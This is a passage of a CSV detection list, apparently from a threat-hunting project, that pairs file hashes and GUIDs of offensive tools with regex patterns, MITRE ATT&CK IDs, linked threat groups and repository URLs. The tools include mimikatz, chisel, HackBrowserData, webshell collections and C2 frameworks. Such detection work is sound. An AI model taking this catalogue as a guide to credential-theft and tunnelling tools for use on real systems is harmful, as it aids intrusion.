T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26578" "*516c132d30d40e8bc6177436077749f29a4862533bb5fa0be81e5d9936b98a04*",".{0,1000}516c132d30d40e8bc6177436077749f29a4862533bb5fa0be81e5d9936b98a04.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26579" "*5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e*",".{0,1000}5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","26581" "*518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed*",".{0,1000}518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26582" "*5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154*",".{0,1000}5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26583" "*518d6457e2d3e20e470f20b6399ce0f0ff5091dc6d2a0826d658247832ff4a8c*",".{0,1000}518d6457e2d3e20e470f20b6399ce0f0ff5091dc6d2a0826d658247832ff4a8c.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#filehash","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","26584" "*5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49*",".{0,1000}5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - 
APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26585" "*5193483fa2796f8c87502eb8efbd9f462dfaa8ea94e9ffdd28bfd2b569f8df54*",".{0,1000}5193483fa2796f8c87502eb8efbd9f462dfaa8ea94e9ffdd28bfd2b569f8df54.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26587" "*51960F7D-76FE-499F-AFBD-ACABD7BA50D1*",".{0,1000}51960F7D\-76FE\-499F\-AFBD\-ACABD7BA50D1.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","#GUIDproject","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","26588" "*519637a04042d8869004121a6e80c35aa2b2370647de9604cbf3ac4eae79424b*",".{0,1000}519637a04042d8869004121a6e80c35aa2b2370647de9604cbf3ac4eae79424b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - 
TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26589" "*519ee1d48987fae9cd561d0b1c6d1f479b6264fa09991a2685ba372011af22f9*",".{0,1000}519ee1d48987fae9cd561d0b1c6d1f479b6264fa09991a2685ba372011af22f9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26590" "*51a6d7bd756ce8d9948c880374da754b32cc907cdb2e17132f247f4fd888c6e2*",".{0,1000}51a6d7bd756ce8d9948c880374da754b32cc907cdb2e17132f247f4fd888c6e2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26592" "*51a9f54d470e4132709b0587618053d9bc4657d524e22fbe5e861264da5a627d*",".{0,1000}51a9f54d470e4132709b0587618053d9bc4657d524e22fbe5e861264da5a627d.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","26594" "*51ac0a907de53723dc23b3e491fae8179f0cd77084a2362f429b9f76b6ae08b0*",".{0,1000}51ac0a907de53723dc23b3e491fae8179f0cd77084a2362f429b9f76b6ae08b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26595" "*51ae11608f904fb4fe9bc6ff63dacd0e318921b2aefcb81481106a1073205ae8*",".{0,1000}51ae11608f904fb4fe9bc6ff63dacd0e318921b2aefcb81481106a1073205ae8.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26596" "*51b43dfa1d70974cab183171c75ff06e39030a53f48a4a7dee31d392f34400a6*",".{0,1000}51b43dfa1d70974cab183171c75ff06e39030a53f48a4a7dee31d392f34400a6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26598" "*51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff*",".{0,1000}51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus 
- Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26599" "*51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e*",".{0,1000}51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26601" "*51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb*",".{0,1000}51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","26602" "*51C6E016-1428-441D-82E9-BB0EB599BBC8*",".{0,1000}51C6E016\-1428\-441D\-82E9\-BB0EB599BBC8.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows 
Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","#GUIDproject","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","26603" "*51c8d89da154a0d95c49225b7fe712d8e45ecbefd0ba803ab8796c56e86a0e21*",".{0,1000}51c8d89da154a0d95c49225b7fe712d8e45ecbefd0ba803ab8796c56e86a0e21.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","26604" "*51cd17b43ad9aa99c77827f7ce8ab9f35d78382479cba7b4e1f479e1e5b4bed1*",".{0,1000}51cd17b43ad9aa99c77827f7ce8ab9f35d78382479cba7b4e1f479e1e5b4bed1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26605" "*51d0a19dcb5fd8dc8c8a98666bb91341a15655de2789dfa842e891f2a71aa2e9*",".{0,1000}51d0a19dcb5fd8dc8c8a98666bb91341a15655de2789dfa842e891f2a71aa2e9.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat 
- COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26606" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26607" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - 
Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26608" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26609" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26610" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26611" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26612" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26613" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26614" "*51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df*",".{0,1000}51d45e6c5df6b43b17afc863794f34000d32fb37cd7c3664efc5bd99039ac3df.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
